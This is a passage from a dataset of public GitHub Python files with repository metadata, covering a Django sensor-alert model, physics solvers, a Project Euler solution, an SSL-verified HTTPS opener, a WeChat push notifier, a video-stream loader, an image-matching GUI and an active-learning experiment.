0\n\n def __str__(self) -> str:\n return f\"{self.name}: {self.sensor_id}\"\n\n\nclass SensorData(models.Model):\n sensor_mac_addr = models.CharField(max_length=50)\n datetime = models.DateTimeField()\n numeric_value = models.DecimalField(max_digits=30, decimal_places=10, null=True)\n string_value = models.TextField(null=True)\n sensor_id = models.CharField(max_length=100)\n owner = models.ForeignKey(\n Sensor, on_delete=models.CASCADE, null=True, default=None, related_name=\"data\"\n )\n\n def __str__(self) -> str:\n return f\"{self.sensor_id} at {self.datetime}\"\n\n def save(self, *arg, **kwargs):\n try:\n owner = Sensor.objects.get(sensor_id=self.sensor_id)\n except ObjectDoesNotExist:\n owner = Sensor.objects.create(name=self.sensor_id, sensor_id=self.sensor_id)\n self.owner = owner\n client = InfluxDBClient(\n url=\"https://us-east-1-1.aws.cloud2.influxdata.com\", token=INFLUXDB_TOKEN\n )\n \n reading = f\"{float(self.numeric_value):.2f}\"\n\n if owner.high_warn:\n if self.numeric_value > owner.high_warn:\n print(f\"Trying to send a text about a high value with reading {reading}\")\n twilio_client.messages.create(\n from_=\"+<FROM_NUMBER>\",\n to=\"+<TO_NUMBER>\",\n body=f\"The sensor {owner.name} is reading {reading}\"\n )\n print(\"Did I do it?\")\n\n if owner.high_critical:\n if self.numeric_value > owner.high_critical:\n print(f\"Got a critical value {reading}\")\n twilio_client.calls.create(\n twiml=f\"<Response><Say>The sensor {owner.name} got a critical reading {reading}</Say></Response>\",\n from_=\"+<FROM_NUMBER>\",\n to=\"+<TO_NUMBER>\",\n )\n print(\"Handle warning critical\")\n\n if not self.pk:\n sensor_name = slugify(owner.name)\n print(\"About to save to influx db!\")\n write_api = client.write_api(write_options=SYNCHRONOUS)\n timestamp = int(self.datetime.timestamp() * 1e9)\n data = f\"environmentals,mac_addr={self.sensor_mac_addr},sensor_id={self.sensor_id},sensor_name={sensor_name} value={self.numeric_value} {timestamp}\"\n write_api.write(INFLUXDB_BUCKET, INFLUXDB_ORG, data)\n print(\"Saved to influxdb\")\n\n super().save(*arg, **kwargs)\n","repo_name":"gojefferson/django-sensor","sub_path":"api/sensors/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26776259492","text":"from numpy import e, tanh, log, linspace, sinh, abs, vstack, array, zeros, cosh\nfrom pylab import show, plot, savefig, legend, xlabel, ylabel, title\nfrom scipy.integrate import solve_bvp\n\ndef InfinitePlane():\n x = linspace(0,5)\n phi0 = 1.\n phiDebyeHuckle = phi0*e**(-x)\n phi = 2*log((1+e**(-x)*tanh(0.25*phi0))/(1-e**(-x)*tanh(0.25*phi0)))\n plot(x,phiDebyeHuckle,label='Debye-Huckle linearization')\n plot(x,phi, label = 'Poisson-Boltzmann equation solution')\n legend()\n show()\n\ndef fun(x, y):\n return vstack((y[1], k**2*sinh(y[0])))\n\ndef bc(ya, yb):\n return array([abs(ya[0]-phi0), abs(yb[0]-phi0)])\n\ndef SymmetryPlanes():\n x = linspace(-1,1,100)\n \n phiDebyeHuckle = phi0*cosh(k*x)/cosh(k)\n y_a = zeros((2, x.size))\n\n res_a = solve_bvp(fun, bc, x, y_a)\n y_plot_a = res_a.sol(x)[0]\n\n plot(x,phiDebyeHuckle,label='Debye-Huckle linearization')\n plot(x,y_plot_a, label = 'Poisson-Boltzmann equation solution')\n xlabel('x')\n ylabel(r'$\\varphi(x)$')\n legend()\n title('Potential distribution across parallel plates \\n'+r'$\\varphi = k^2 \\sinh(\\varphi), \\varphi(\\pm 1) = \\zeta, \\zeta = {}, k = {}$'.format(phi0, k))\n savefig('out.png')\n show()\n\nphi0 =6.\nk = 4.\nSymmetryPlanes()\n","repo_name":"konstgav/electrokinetics","sub_path":"zeta.py","file_name":"zeta.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"35303664394","text":"from resources.texts import logo\nfrom serverueberwachung.console_management.CommandHandler import CommandHandler\nfrom serverueberwachung.console_management.Command_List import item_index, command_list\nfrom serverueberwachung.resources.uid_list import HOST, PORT\n\n\n# the user input the network configuration for connecting to the tinkerforge-server\ndef bootup():\n config_finished = False\n global HOST\n global PORT\n\n # try:\n # while not config_finished:\n # if HOST == \"\":\n # HOST = input(\"Bitte geben sie die IP/Domain der Serverüberwachung ein: \")\n # elif PORT == 0:\n # PORT = int(input(\"Bitte geben sie den passenden Port ein: \"))\n # else:\n # config_finished = True\n # except:\n # print(\"keine Verbindung\")\n\n\n# beginning of the main loop\nrunning = True\nprint(logo)\ncommandHandler = CommandHandler()\n\nbootup()\n\n# the main-loop of the programm\nwhile running:\n command = input(\"=> \")\n if command.lower() == \"exit\":\n running = False\n else:\n commandHandler.evaluate(command.lower())\n","repo_name":"JustinThlk/serverueberwachung","sub_path":"serverueberwachung/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"73488012104","text":"##\n#\n# Project Euler 74\n# https://projecteuler.net/problem=74\n# By: Elias Lundell\n#\n##\n\nfrom multiprocessing import Pool\n\nprefac = {\"0\": 1, \"1\": 1, \"2\": 2, \"3\": 6, \"4\": 24, \"5\": 120, \"6\": 720, \"7\": 5040, \"8\": 40320, \"9\": 362880}\n\ndef chain_length(n):\n chain = {n}\n new = n\n while True:\n clen = len(chain)\n new = sum(map(lambda m: prefac[m], str(new)))\n if new in chain or clen > 60:\n return clen\n else:\n chain.add(new)\n\np = Pool(12)\n\nchain_lengths = p.map(chain_length, [x for x in range(1, 1000001)])\n\nprint(chain_lengths.count(60))\n\n","repo_name":"LogFlames/project-euler-python","sub_path":"pe74.py","file_name":"pe74.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12206595322","text":"import os\nimport httplib\nimport socket\nimport ssl\nimport urllib2\n\n\nPEM_FILE = os.path.join(os.path.dirname(__file__), 'WebMoneyCA.crt')\n\n\nclass VerifiedHTTPSConnection(httplib.HTTPConnection):\n \"Verified connection to SSL host\"\n\n default_port = 443\n\n def connect(self):\n sock = socket.create_connection(\n (self.host, self.port),\n self.timeout, self.source_address\n )\n\n if self._tunnel_host:\n self.sock = sock\n self._tunnel()\n\n self.sock = ssl.wrap_socket(sock, ca_certs=PEM_FILE, cert_reqs=ssl.CERT_REQUIRED)\n\n\nclass HTTPSHandler(urllib2.HTTPSHandler):\n def https_open(self, req):\n return self.do_open(VerifiedHTTPSConnection, req)\n\n\nwm_opener = urllib2.build_opener(HTTPSHandler)\n","repo_name":"vden/python-webmoney","sub_path":"webmoney/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"71310661064","text":"# -*- encoding=utf8 -*-\n\nimport yaml\nimport json\nimport os.path\nimport urllib.request\nimport urllib.parse\n\nimport logging\n\nCURDIR = os.path.dirname(__file__)\nCONFIG_FILE = os.path.join(CURDIR, 'configs', 'wxpusher.yaml')\n\nWX_ENABLED = True\nif not os.path.exists(CONFIG_FILE):\n print('Cannot find config {}'.format(CONFIG_FILE))\n WX_ENABLED = False\n\nCONFIG = yaml.load(open(CONFIG_FILE))\nUID = CONFIG['user_id']\nTOKEN = CONFIG['token']\n\ndef wx_send(msg):\n if not WX_ENABLED:\n return False\n\n data = {\n 'appToken': TOKEN,\n 'content': msg,\n 'uid': UID\n }\n\n try:\n data = urllib.parse.urlencode(data)\n url = 'http://wxpusher.zjiecode.com/api/send/message/?{}'.format(data)\n response = urllib.request.urlopen(url)\n\n ret = json.loads(response.read())\n return ret['success']\n except:\n return False\n\ndef install_logging_handler(logger, fmt=None, lvl=logging.WARNING):\n wx_handler = WXHandler()\n wx_handler.setLevel(lvl)\n\n if fmt:\n if not isinstance(fmt, logging.Formatter) and isinstance(fmt, str):\n fmt = logging.Formatter(fmt)\n else:\n raise RuntimeError('Unknown formater type: {}'.format(fmt))\n\n wx_handler.setFormatter(fmt)\n\n logger.addHandler(wx_handler)\n\nclass WXHandler(logging.Handler):\n def emit(self, record):\n wx_send(self.format(record))\n\n__all__ = ['wx_send', 'install_logging_handler']\n\nif __name__ == '__main__':\n assert wx_send('send_msg test.'), 'Failed to send msg.'\n assert wx_send('send_msg 中文测试'), 'Failed to send msg.'\n\n","repo_name":"yrlihuan/LinuxConf","sub_path":"wxpusher.py","file_name":"wxpusher.py","file_ext":"py","file_size_in_byte":1506,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"21176577950","text":"'''Crie um programa que tenha uma função chamada voto() que vai receber como parâmetro\no ano de nascimento de uma pessoa, retornando um valor literal indicando se uma pessoa\ntem voto NEGADO, OPCIONAL e OBRIGATÓRIO nas eleições.'''\n\n\ndef voto(v):\n from datetime import date\n ano = date.today().year\n idade = ano - v\n if idade < 16:\n return print(f'Com {idade} anos : NÃO VOTA')\n elif 16 <= idade < 18 or idade >= 65:\n return print(f'Com {idade} anos: VOTO OPCIONAL.')\n else:\n return print(f'Com idade {idade}: VOTO OBRIGATÓRIO.')\n\n\nano = int(input('Digite o ano de seu nascimento: '))\nvoto(ano)\n\n","repo_name":"Alexandre1961/Python","sub_path":"curso_em_video/ex101.py","file_name":"ex101.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"25933622283","text":"import argparse\nimport logging\nimport time\n\nimport numpy as np\nimport torch\n\ntry:\n import cv2 # pylint: disable=import-error\nexcept ImportError:\n cv2 = None\n\nimport PIL\ntry:\n import PIL.ImageGrab\nexcept ImportError:\n pass\n\ntry:\n import mss\nexcept ImportError:\n mss = None\n\nLOG = logging.getLogger(__name__)\n\n\n# pylint: disable=abstract-method\nclass Stream(torch.utils.data.IterableDataset):\n horizontal_flip = None\n rotate = None\n crop = None\n scale = 1.0\n start_frame = None\n start_msec = None\n max_frames = None\n\n def __init__(self, source, *,\n preprocess=None,\n with_raw_image=True):\n super().__init__()\n\n self.source = source\n self.preprocess = preprocess\n self.with_raw_image = with_raw_image\n\n @classmethod\n def cli(cls, parser: argparse.ArgumentParser):\n \"\"\"Command line interface (CLI) to extend argument parser.\"\"\"\n group = parser.add_argument_group('Stream')\n group.add_argument('--horizontal-flip', default=False, action='store_true',\n help='mirror input image')\n group.add_argument('--scale', default=1.0, type=float,\n help='input image scale factor')\n group.add_argument('--start-frame', type=int, default=None,\n help='start frame')\n group.add_argument('--start-msec', type=float, default=None,\n help='start millisecond')\n group.add_argument('--crop', type=int, nargs=4, default=None,\n help='left top right bottom')\n group.add_argument('--rotate', default=None, choices=('left', 'right', '180'),\n help='rotate')\n group.add_argument('--max-frames', type=int, default=None,\n help='max frames')\n\n @classmethod\n def configure(cls, args: argparse.Namespace):\n \"\"\"Take the parsed argument parser output and configure class variables.\"\"\"\n cls.horizontal_flip = args.horizontal_flip\n cls.scale = args.scale\n cls.start_frame = args.start_frame\n cls.start_msec = args.start_msec\n cls.crop = args.crop\n cls.rotate = args.rotate\n cls.max_frames = args.max_frames\n\n # pylint: disable=unsubscriptable-object\n def preprocessing(self, image):\n if self.scale != 1.0:\n image = cv2.resize(image, None, fx=self.scale, fy=self.scale)\n LOG.debug('resized image size: %s', image.shape)\n if self.horizontal_flip:\n image = image[:, ::-1]\n if self.crop:\n if self.crop[0]:\n image = image[:, self.crop[0]:]\n if self.crop[1]:\n image = image[self.crop[1]:, :]\n if self.crop[2]:\n image = image[:, :-self.crop[2]]\n if self.crop[3]:\n image = image[:-self.crop[3], :]\n if self.rotate == 'left':\n image = np.swapaxes(image, 0, 1)\n image = np.flip(image, axis=0)\n elif self.rotate == 'right':\n image = np.swapaxes(image, 0, 1)\n image = np.flip(image, axis=1)\n elif self.rotate == '180':\n image = np.flip(image, axis=0)\n image = np.flip(image, axis=1)\n\n image_pil = PIL.Image.fromarray(np.ascontiguousarray(image))\n meta = {\n 'hflip': False,\n 'offset': np.array([0.0, 0.0]),\n 'scale': np.array([1.0, 1.0]),\n 'valid_area': np.array([0.0, 0.0, image_pil.size[0], image_pil.size[1]]),\n }\n processed_image, anns, meta = self.preprocess(image_pil, [], meta)\n return image, processed_image, anns, meta\n\n # pylint: disable=too-many-branches\n def __iter__(self):\n if self.source == 'screen':\n capture = 'screen'\n if mss is None:\n print('!!!!!!!!!!! install mss (pip install mss) for faster screen grabs')\n else:\n capture = cv2.VideoCapture(self.source)\n if self.start_frame:\n capture.set(cv2.CAP_PROP_POS_FRAMES, self.start_frame)\n if self.start_msec:\n capture.set(cv2.CAP_PROP_POS_MSEC, self.start_msec)\n\n frame_start = 0 if not self.start_frame else self.start_frame\n frame_i = frame_start\n while True:\n frame_i += 1\n if self.max_frames and frame_i - frame_start > self.max_frames:\n LOG.info('reached max frames %d', self.max_frames)\n break\n\n if capture == 'screen':\n if mss is None:\n image = np.asarray(PIL.ImageGrab.grab().convert('RGB'))\n else:\n with mss.mss() as sct:\n monitor = sct.monitors[1]\n image = np.asarray(sct.grab(monitor))[:, :, 2::-1]\n else:\n _, image = capture.read()\n if image is not None:\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n if image is None:\n LOG.info('no more images captured')\n break\n\n start_preprocess = time.perf_counter()\n image, processed_image, anns, meta = self.preprocessing(image)\n meta['frame_i'] = frame_i\n meta['preprocessing_s'] = time.perf_counter() - start_preprocess\n\n if self.with_raw_image:\n yield image, processed_image, anns, meta\n else:\n yield processed_image, anns, meta\n","repo_name":"openpifpaf/openpifpaf","sub_path":"src/openpifpaf/stream.py","file_name":"stream.py","file_ext":"py","file_size_in_byte":5559,"program_lang":"python","lang":"en","doc_type":"code","stars":1098,"dataset":"github-code","pt":"81"} +{"seq_id":"6319632631","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 13 22:59:24 2020\r\n\r\n@author: ADMIN-PC\r\n\"\"\"\r\nimport numpy as np\r\n\r\ndef transform(X,degree = 2):\r\n \"\"\"\r\n Transform data to polynomial features\r\n Generate a new feature matrix consisting of all polynomial combinations of the features with degree less than or equal to the specified degree. \r\n For example, if an input sample is np.array([a, b]), the degree-2 polynomial features with \"include_bias=True\" are [1, a, b, a^2, ab, b^2].\r\n \r\n Inputs:\r\n param X : (np.array) Dataset to be transformed\r\n \r\n Outputs:\r\n returns (np.array) Tranformed dataset.\r\n \"\"\"\r\n out = [1]\r\n for deg in range(1,degree+1):\r\n for num in X:\r\n out.append(num**deg)\r\n return np.array(out)\r\n\r\nX = np.array([2,3, 4])\r\nprint(transform(X))","repo_name":"vasavamsi/Machine-Learning-Assignment-2","sub_path":"preprocessing/test_script.py","file_name":"test_script.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32214134926","text":"import numpy as np\r\nimport Crank_Nicolson_Method\r\n\r\n# Density\r\nrho = 1.0\r\n# Velocity\r\nu = 1.0\r\n# Diffusion coefficient\r\nGamma = 0.1\r\n# Length of Domain\r\nL = 1.0\r\n\r\n# Number of points in grid (minus 1)\r\nm = 1000\r\n# Grid distance\r\nDx = L / m\r\n\r\n# Total time for boundary information \r\n# to travel across the domain\r\ntotal_t = 2 # max(abs(rho * L**2 / Gamma), abs(L / u))\r\n# Time step\r\nDt = 0.0001\r\n# Number of time steps to run (minus 1)\r\nm_t = int(np.ceil(total_t / Dt))\r\n\r\n# Courant number\r\nc = u * Dt / Dx\r\n# Ratio to time step to diffusion time across cell\r\nd = Gamma * Dt / (rho * (Dx**2))\r\n\r\nphi = Crank_Nicolson_Method.solve(m, Dx, m_t, Dt, d, c, 3)\r\n\r\nnp.save('Exact_Solution', phi)\r\n\r\n","repo_name":"Souritra-Garai/Steady-State-Convection-Diffusion-Problem","sub_path":"2D Steady State Problem/Exact_Solution.py","file_name":"Exact_Solution.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"1198612467","text":"import cv2\r\nimport numpy as np\r\nimport tkinter\r\nfrom tkinter import messagebox\r\nfrom tkinter import filedialog\r\nfrom tkinter import *\r\n\r\ndef original_Pic():\r\n \r\n \r\n global filename1\r\n filename1 = filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"jpeg files\",\"*.jpg\"),(\"all files\",\"*.*\")))\r\n \r\n \r\ndef compare_Pic():\r\n \r\n \r\n global filename2\r\n filename2 = filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"jpeg files\",\"*.jpg\"),(\"all files\",\"*.*\")))\r\n \r\n\r\n\r\ndef twentyone():\r\n original = cv2.imread(filename1)\r\n image_to_compare = cv2.imread(filename2)\r\n\r\n\r\n # 1) Check if 2 images are equals\r\n if original.shape == image_to_compare.shape:\r\n print(\"The images have same size and channels\")\r\n difference = cv2.subtract(original, image_to_compare)\r\n b, g, r = cv2.split(difference)\r\n\r\n if cv2.countNonZero(b) == 0 and cv2.countNonZero(g) == 0 and cv2.countNonZero(r) == 0:\r\n print(\"The images are completely Equal\")\r\n else:\r\n print(\"The images are NOT equal\")\r\n\r\n # 2) Check for similarities between the 2 images\r\n sift = cv2.SIFT_create()\r\n kp_1, desc_1 = sift.detectAndCompute(original, None)\r\n kp_2, desc_2 = sift.detectAndCompute(image_to_compare, None)\r\n\r\n index_params = dict(algorithm=0, trees=5)\r\n search_params = dict()\r\n flann = cv2.FlannBasedMatcher(index_params, search_params)\r\n\r\n matches = flann.knnMatch(desc_1, desc_2, k=2)\r\n\r\n good_points = []\r\n for m, n in matches:\r\n if m.distance < 0.6*n.distance:\r\n good_points.append(m)\r\n\r\n # Define how similar they are\r\n number_keypoints = 0\r\n if len(kp_1) <= len(kp_2):\r\n number_keypoints = len(kp_1)\r\n else:\r\n number_keypoints = len(kp_2)\r\n\r\n\r\n #print(\"Keypoints 1ST Image: \" + str(len(kp_1)))\r\n #print(\"Keypoints 2ND Image: \" + str(len(kp_2)))\r\n #print(\"GOOD Matches:\", len(good_points))\r\n #print(\"How good it's the match: \", len(good_points) / number_keypoints*100 )\r\n global matchresult\r\n matchresult=len(good_points) / number_keypoints*100\r\n\r\n matchresult1='The Match Result Is:- ' , matchresult , ' %'\r\n a23=tkinter.Label(win,text= matchresult1)\r\n a23.place(x=200,y=600, height=50,width=900)\r\n a23['bg']='lightyellow'\r\n a23['fg']=\"green\"\r\n a23.config(font=(\"Courier\", 15,\"bold\"))\r\n\r\n \r\n result = cv2.drawMatches(original, kp_1, image_to_compare, kp_2, good_points, None)\r\n \r\n messagebox.showinfo('Matching Result is ', matchresult1)\r\n cv2.imshow(\"result\", cv2.resize(result, None, fx=0.4, fy=0.4))\r\n \r\n #cv2.imwrite(\"feature_matching.jpg\", result)\r\n\r\n\r\n #cv2.imshow(\"Original\", cv2.resize(original, None, fx=0.4, fy=0.4))\r\n #cv2.imshow(\"Duplicate\", cv2.resize(image_to_compare, None, fx=0.4, fy=0.4))\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\n\r\n\r\n\r\n\r\n\r\nwin= tkinter.Tk()\r\nwin.minsize(1080,720)\r\nwin['bg']='plum1'\r\na30=tkinter.Label(win,text=\"IMAGE \\nMATCHING/COMPARISION\")\r\n\r\na30.place(x=300,y=50, height=200,width=800)\r\na30['fg']=\"blue2\"\r\na30.config(font=(\"Courier\", 22,\"bold\"))\r\na30['bg']='plum1'\r\n\r\na31=tkinter.Label(win,text=\"Load the Original Image here\")\r\na31.place(x=200,y=250, height=100,width=400)\r\nb31 = tkinter.Button(text = \"Click Here\",command = original_Pic ,activeforeground = \"red\",activebackground = \"pink\",pady=10)\r\nb31.place(x=300,y=350, height=40,width=200)\r\n\r\na31['bg']='plum1'\r\nb31['fg']=\"dodgerblue\"\r\na31.config(font=(\"Georgie\", 20,\"bold\"))\r\nb31['bg']='lightyellow'\r\nb31.config(font=(\"Courier\", 15,\"bold\"))\r\n\r\na32=tkinter.Label(win,text=\"Load the another Image here\")\r\na32.place(x=700,y=250, height=100,width=500)\r\nb32 = tkinter.Button(text = \"Click Here\",command = compare_Pic ,activeforeground = \"red\",activebackground = \"pink\",pady=10)\r\nb32.place(x=820,y=350, height=40,width=200)\r\n\r\na32['bg']='plum1'\r\nb32['fg']=\"dodgerblue\"\r\na32.config(font=(\"Georgie\", 20,\"bold\"))\r\nb32['bg']='lightyellow'\r\nb32.config(font=(\"Courier\", 15,\"bold\"))\r\n\r\nb32 = tkinter.Button(text = \"Go\",command = twentyone ,activeforeground = \"red\",activebackground = \"pink\",pady=10)\r\nb32.place(x=600,y=500, height=40,width=100)\r\nb32['bg']='lightyellow'\r\nb32['fg']=\"red\"\r\nb32.config(font=(\"Courier\", 15,\"bold\"))\r\n\r\n","repo_name":"VivekVashisth07/Face_voice_comparision_and_color_detection_","sub_path":"face_voice_color/face comparision/how_similar_two_images_are2.py","file_name":"how_similar_two_images_are2.py","file_ext":"py","file_size_in_byte":4278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"30647010867","text":"'''Original Source from https://github.com/Riashat\n'''\nfrom __future__ import print_function\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport sys\nsys.path.insert(0, '../')\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.layers.convolutional import Convolution2D, MaxPooling2D\nfrom keras.optimizers import SGD, Adadelta, Adagrad, Adam\nfrom keras.utils import np_utils, generic_utils\nfrom six.moves import range\nimport numpy as np\nimport scipy as sp\nfrom keras import backend as K\nimport random\nrandom.seed(2001)\nimport scipy.io\nimport matplotlib.pyplot as plt\nfrom keras.regularizers import l2, activity_l2\nfrom sklearn import metrics\nfrom sklearn.cross_validation import StratifiedShuffleSplit\nfrom imblearn.over_sampling import SMOTE, RandomOverSampler\n\nimport glob as glob\nfrom active_deep_utilities import *\nfrom model_utilities import *\nimport os\nimport argparse\n\ndef run():\n currentScript = os.path.basename(__file__)\n if dataset_type == '0':\n data_files = '../dataset/cropped/zero/*.npz'\n temp = currentScript\n currentScript = \"zeroData_\"+temp\n if oversample:\n save_location = '../Results/Cropped_Results/oversampled/Zeros/' + currentScript\n else:\n save_location = '../Results/Cropped_Results/Zeros/' + currentScript\n elif dataset_type == '-1':\n data_files = '../dataset/cropped/negative_backgrounds/*.npz'\n temp = currentScript\n currentScript = \"negatives_\"+temp\n if oversample:\n save_location = '../Results/Cropped_Results/oversampled/negatives/' + currentScript\n else:\n save_location = '../Results/Cropped_Results/negatives/' + currentScript\n\n save_location = '../Results/Cropped_Results/negatives/' + currentScript\n elif dataset_type == 'scaled_negative':\n data_files = '../dataset/cropped/scaled_negative/*.npz'\n temp = currentScript\n currentScript = \"scaled_negatives_\"+temp\n if oversample:\n save_location = '../Results/Cropped_Results/oversampled/scaled_negatives/' + currentScript\n else:\n save_location = '../Results/Cropped_Results/scaled_negatives/' + currentScript\n else:\n print (\"Pass the appropriate argument for the type of dataset\")\n quit()\n\n all_files = glob.glob(data_files)\n all_files = all_files #load the number of folders indicated in the slice.... loading all will require more memory\n\n batch_size = 128\n nb_classes = 2\n\n # input image dimensions\n img_rows, img_cols = 40, 40\n\n nb_filters = 32\n # size of pooling area for max pooling\n nb_pool = 3\n # convolution kernel size\n nb_conv = 4\n\n nb_epoch = 50\n\n acquisition_iterations = 30 # number of aquisitions from unlabeled samples\n\n dropout_iterations = 5 # number of dropout ROUNDS for uncertainty estimation\n\n active_query_batch = 60 # number to added to the training data after active score evaluation\n # All unlabeled samples could be considered\n\n X_Train_percent = .2 # initial train percent from the entire training set\n x_val_percent = .5 # of leftovers\n\n pool_batch_samples = 600 #Number to sample from the Pool for dropout evaluation\n\n img_dim = img_rows * img_cols #flattened image dimension\n # all_files = all_files[:3]\n XY_Data = fetch_data(all_files, slice_range)\n\n\n X = XY_Data[:, :img_dim]\n y = XY_Data[:, img_dim]\n\n sss = StratifiedShuffleSplit(y, n_experiments, test_size=0.33, random_state=0)\n smote_balancer = SMOTE(random_state=0)\n random_balancer = RandomOverSampler(random_state=0)\n # Number of times to perform experiments... Note this is different from the epoch\n e = 0 #starting experiment number\n for train_index, test_index in sss:\n # the data, split between train and test sets\n X_Train_all, X_Test = X[train_index], X[test_index]\n Y_Train_all, Y_Test = y[train_index], y[test_index]\n\n \t# if K.image_data_format() == 'channels_first':\n \t#reshape to appropriate backend format\n X_Train_all = X_Train_all.reshape(X_Train_all.shape[0], 1, img_rows,\n img_cols)\n X_Test = X_Test.reshape(X_Test.shape[0], 1, img_rows, img_cols)\n Y_Test = np_utils.to_categorical(Y_Test, nb_classes)\t#one hot encode Y_Test\n\n\n\n input_shape = (1, img_rows, img_cols)\n #split train set into train, val, and unlabeled pool\n X_Train, Y_Train, X_Pool, Y_Pool = split_train_ratio_based(X_Train_all, Y_Train_all, img_rows = img_rows, img_cols =img_cols, nb_classes= nb_classes,\n X_Train_percent = X_Train_percent, val_percent =x_val_percent)\n\n\n\n #performance evaluation metric for each experiment\n All_auc = list() #Receiver Operator Characteristic data\n All_pre = list()\n All_rec = list()\n All_ap = list()\n All_recall_score = list()\n All_precision_score = list()\n All_confusion_matrix = list()\n X_Pool_All = np.zeros(shape=(1)) #store all the pooled indices\n\n model = build_model(nb_filters, nb_conv, nb_pool, input_shape, nb_classes, X_Train.shape[0], c_param = 3.5)\n model.compile(loss='categorical_crossentropy', optimizer='adam')\n\n model.fit(\n X_Train,\n Y_Train,\n batch_size=batch_size,\n nb_epoch=nb_epoch,\n show_accuracy=True,\n verbose=1)\n\n #collect statistics of performance\n y_predicted = model.predict(X_Test, batch_size=batch_size)\n y_reversed = np.argmax(Y_Test, axis=1)\n y_score = np.argmax(y_predicted, axis =1)\n\n fpr = dict()\n tpr = dict()\n auc = dict()\n #collect statistics for the two classes\n for ci in range(nb_classes):\n fpr[ci], tpr[ci], _ = metrics.roc_curve(Y_Test[:, ci], y_predicted[:, ci])\n auc[ci] = metrics.auc(fpr[ci], tpr[ci])\n\n precision_score = metrics.precision_score(y_reversed, y_score)\n recall_score = metrics.recall_score(y_reversed, y_score)\n precision, recall, _ = metrics.precision_recall_curve(y_reversed, y_score, pos_label = 1)\n average_precision = metrics.average_precision_score(y_reversed, y_score)\n confusion_matrix = metrics.confusion_matrix(y_reversed, y_score)\n print (\"Script :\"+currentScript)\n print (\"Experiment \", e, \"acquisition \", 0)\n print('Average Precision', average_precision, \"precision score\", precision_score, \"recall score \", recall_score)\n print ('AUC', auc)\n\n All_auc.append(auc)\n All_pre.append(precision)\n All_rec.append(recall)\n All_ap.append(average_precision)\n All_recall_score.append(recall_score)\n All_precision_score.append(precision_score)\n All_confusion_matrix.append(confusion_matrix)\n print('Starting Active Learning in Experiment ', e)\n\n for i in range(acquisition_iterations):\n print('POOLING ITERATION', i)\n X_Pool_index = np.asarray(random.sample(range(0, pool_batch_samples), active_query_batch))\n\n Pooled_X = X_Pool[X_Pool_index, :, :, :]\n Pooled_Y = Y_Pool[X_Pool_index]\n\n # Delete the pool set from X_Pool\n X_Pool = np.delete(X_Pool, (X_Pool_index), axis=0)\n Y_Pool = np.delete(Y_Pool, (X_Pool_index), axis=0)\n\n\n X_Train = np.concatenate((X_Train, Pooled_X), axis=0)\n Y_Train = np.concatenate((Y_Train, Pooled_Y), axis=0)\n\n if oversample:\n print (\"Oversamplying\")\n X_Train = X_Train.reshape((X_Train.shape[0], img_rows**2))\n # print (X_Train.shape)\n\n Y_Train = np.argmax(Y_Train, axis=1)\n # print (Y_Train)\n min_class_num =np.min(np.bincount(Y_Train.reshape(-1).astype(np.int)))\n if min_class_num < 4:\n # print (\"Random balancer\")\n X_Train, Y_Train =random_balancer.fit_sample(X_Train, Y_Train)\n else:\n X_Train, Y_Train = smote_balancer.fit_sample(X_Train, Y_Train)\n # print (\"Smote balancer\")\n # print (Y_Train)\n\n # print (X_Train.shape)\n # print (Y_Train)\n #reshape it back and continue\n X_Train= X_Train.reshape((X_Train.shape[0], 1, img_rows, img_cols ))\n Y_Train = np_utils.to_categorical(Y_Train, nb_classes)\n\n\n model = build_model(nb_filters, nb_conv, nb_pool, input_shape, nb_classes, X_Train.shape[0], c_param = 3.5)\n model.compile(loss='categorical_crossentropy', optimizer='adam')\n model.fit(\n X_Train,\n Y_Train,\n batch_size=batch_size,\n nb_epoch=nb_epoch,\n show_accuracy=True,\n verbose=1)\n\n #collect statistics of performance\n y_predicted = model.predict(X_Test, batch_size=batch_size)\n y_reversed = np.argmax(Y_Test, axis=1)\n y_score = np.argmax(y_predicted, axis =1)\n\n fpr = dict()\n tpr = dict()\n auc = dict()\n #collect statistics for the two classes\n for ci in range(nb_classes):\n fpr[ci], tpr[ci], _ = metrics.roc_curve(Y_Test[:, ci], y_predicted[:, ci])\n auc[ci] = metrics.auc(fpr[ci], tpr[ci])\n\n precision_score = metrics.precision_score(y_reversed, y_score)\n recall_score = metrics.recall_score(y_reversed, y_score)\n precision, recall, _ = metrics.precision_recall_curve(y_reversed, y_score, pos_label = 1)\n average_precision = metrics.average_precision_score(y_reversed, y_score)\n confusion_matrix = metrics.confusion_matrix(y_reversed, y_score)\n print (\"Script :\"+currentScript)\n print (\"Experiment \", e, \"acquisition \", i)\n print('Average Precision', average_precision, \"precision score\", precision_score, \"recall score \", recall_score)\n print ('AUC', auc)\n\n All_auc.append(auc)\n All_pre.append(precision)\n 